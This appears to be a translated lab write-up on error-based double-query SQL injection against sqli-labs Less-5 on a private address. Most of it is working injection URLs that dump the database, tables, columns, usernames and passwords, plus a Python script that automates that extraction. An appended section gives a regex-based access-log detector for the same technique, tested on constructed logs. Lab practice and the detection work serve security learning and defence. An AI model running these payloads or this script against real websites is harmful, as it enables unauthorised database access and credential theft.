http://192.168.1.113:86/Less-5/?id=1' union SELECT null,count(*),concat((select database()),floor(rand()*2))as a from information_schema.tables group by a%23
This is the first database query; the page shows nothing much.
Second click:
When dumping the table names I ran into a new problem:
http://192.168.1.113:86/Less-5/?id=1' union SELECT null,count(*),concat((select table_name from information_schema.tables where table_schema='security'),floor(rand()*2))as a from information_schema.tables group by a%23
http://192.168.1.113:86/Less-5/?id=1' union SELECT null,count(*),concat((select table_name from information_schema.tables where table_schema='security'limit 0,1),floor(rand()*2))as a from information_schema.tables group by a%23
Second table:
http://192.168.1.113:86/Less-5/?id=1' union SELECT null,count(*),concat((select table_name from information_schema.tables where table_schema='security'limit 1,1),floor(rand()*2))as a from information_schema.tables group by a%23
Third table:
http://192.168.1.113:86/Less-5/?id=1' union SELECT null,count(*),concat((select table_name from information_schema.tables where table_schema='security'limit 2,1),floor(rand()*2))as a from information_schema.tables group by a%23
Fourth table:
http://192.168.1.113:86/Less-5/?id=1' union SELECT null,count(*),concat((select table_name from information_schema.tables where table_schema='security'limit 3,1),floor(rand()*2))as a from information_schema.tables group by a%23
Finally it shows up!
Dumping column names:
Column one:
http://192.168.1.113:86/Less-5/?id=1' union SELECT null,count(*),concat((select column_name from information_schema.columns where table_name='users'limit 12,1),floor(rand()*2))as a from information_schema.tables group by a%23
Column two:
http://192.168.1.113:86/Less-5/?id=1' union SELECT null,count(*),concat((select column_name from information_schema.columns where table_name='users'limit 13,1),floor(rand()*2))as a from information_schema.tables group by a%23
Dumping field values:
Field one:
http://192.168.1.113:86/Less-5/?id=1' union SELECT null,count(*),concat((select username from users limit 0,1),floor(rand()*2))as a from information_schema.tables group by a%23
Field two:
http://192.168.1.113:86/Less-5/?id=1' union SELECT null,count(*),concat((select password from users limit 0,1),floor(rand()*2))as a from information_schema.tables group by a%23
Note: when dumping, you may need to click two or more times; it has a buffer time, so just query a few more times and the value comes out.
exp
An exp script written by an expert online, well worth learning from!
```python
import requests
from bs4 import BeautifulSoup  # imported by the original script but never used

db_name = ''
table_list = []
column_list = []
url = '''http://192.168.1.113:86/Less-5/?id=1'''

### Get the current database name ###
# Each payload forces a duplicate-key error whose message echoes the value wrapped
# in ':' (0x3a); rand(0) is seeded, so the error fires reliably on the first request.
print('Current database name:')
payload = '''' and 1=(select count(*) from information_schema.columns group by concat(0x3a,(select database()),0x3a,floor(rand(0)*2)))--+'''
r = requests.get(url + payload)
db_name = r.text.split(':')[-2]
print('[+]' + db_name)

### Get the table names ###
print('Tables in database %s:' % db_name)
for i in range(50):
    payload = '''' and 1=(select count(*) from information_schema.columns group by concat(0x3a,(select table_name from information_schema.tables where table_schema='%s' limit %d,1),0x3a,floor(rand(0)*2)))--+''' % (db_name, i)
    r = requests.get(url + payload)
    if 'group_key' not in r.text:  # no duplicate-key error: past the last row
        break
    table_name = r.text.split(':')[-2]
    table_list.append(table_name)
    print('[+]' + table_name)

### Get the column names ###
#### using the users table as the example ####
print('Columns in table %s:' % table_list[-1])
for i in range(50):
    payload = '''' and 1=(select count(*) from information_schema.columns group by concat(0x3a,(select column_name from information_schema.columns where table_name='%s' limit %d,1),0x3a,floor(rand(0)*2)))--+''' % (table_list[-1], i)
    r = requests.get(url + payload)
    if 'group_key' not in r.text:
        break
    column_name = r.text.split(':')[-2]
    column_list.append(column_name)
    print('[+]' + column_name)

### Get the field values ###
#### using the username column as the example ####
print('Values in column %s:' % column_list[-2])
for i in range(50):
    payload = '''' and 1=(select count(*) from information_schema.columns group by concat(0x3a,(select %s from %s.%s limit %d,1),0x3a,floor(rand(0)*2)))--+''' % (column_list[-2], db_name, table_list[-1], i)
    r = requests.get(url + payload)
    if 'group_key' not in r.text:
        break
    dump = r.text.split(':')[-2]
    print('[+]' + dump)
```
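From the defender's side, as an added example that is not part of the original post or of the script above: the double-query payloads on this page leave a recognizable signature in web-server access logs (COUNT(*), GROUP BY, CONCAT over a subquery, FLOOR(RAND()*2), usually against information_schema, terminated by # or --). The Python detector below scans combined-format log lines for that signature and requires the three structurally essential tokens before alerting; the log lines, IPs and timestamps are constructed, and the log-format regex is an assumption.

```python
import re
from urllib.parse import unquote_plus

# Tokens of the double-query technique walked through above. Case-insensitive,
# whitespace-tolerant, and accepting a seeded rand(0) as used in the script.
SIGNALS = {
    "count_aggregate": re.compile(r"\bcount\s*\(\s*\*\s*\)", re.I),
    "group_by":        re.compile(r"\bgroup\s+by\b", re.I),
    "rand_floor":      re.compile(r"\bfloor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\)", re.I),
    "concat":          re.compile(r"\bconcat\s*\(", re.I),
    "info_schema":     re.compile(r"\binformation_schema\.", re.I),
    "inline_comment":  re.compile(r"(#|--\s)"),
}
# The three tokens without which the duplicate-key error cannot fire.
CORE = {"count_aggregate", "group_by", "rand_floor"}
# Assumed combined log format (constructed sample below).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) '
                    r'(?P<path>\S+) \S+" (?P<status>\d{3}) ')

def signals_in(path):
    """Percent-decode the request path and return the names of matching signals."""
    q = unquote_plus(path)
    return sorted(name for name, rx in SIGNALS.items() if rx.search(q))

def is_double_query_injection(path):
    """True only when all CORE tokens appear; the other signals only raise confidence."""
    return CORE <= set(signals_in(path))

def scan_log(lines):
    """Return one alert per matching request: ip, timestamp, status and signals."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not is_double_query_injection(m["path"]):
            continue
        # Status is 200 for both probes: the lab echoes the SQL error in the page body.
        alerts.append({"ip": m["ip"], "ts": m["ts"], "status": m["status"],
                       "signals": signals_in(m["path"])})
    return alerts

# Constructed access-log lines: two probes in the style of this page, three benign requests.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Oct/2023:12:00:01 +0000] "GET /Less-5/?id=1 HTTP/1.1" 200 512',
    '192.0.2.10 - - [10/Oct/2023:12:00:07 +0000] "GET /Less-5/?id=1%27%20union%20SELECT%20null,count(*),concat((select%20database()),floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a%23 HTTP/1.1" 200 644',
    '192.0.2.10 - - [10/Oct/2023:12:00:09 +0000] "GET /Less-5/?id=1%27%20and%201=(select%20count(*)%20from%20information_schema.columns%20group%20by%20concat(0x3a,(select%20database()),0x3a,floor(rand(0)*2)))--+ HTTP/1.1" 200 644',
    '192.0.2.11 - - [10/Oct/2023:12:01:00 +0000] "GET /search?q=group+by+count(*) HTTP/1.1" 200 900',
    '192.0.2.12 - - [10/Oct/2023:12:01:30 +0000] "GET /Less-5/?id=2 HTTP/1.1" 200 512',
]
if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

The benign search line carries COUNT(*) and GROUP BY but no FLOOR(RAND()*2), so it is not flagged; requiring the full core set is what keeps ordinary reporting queries out of the alert list.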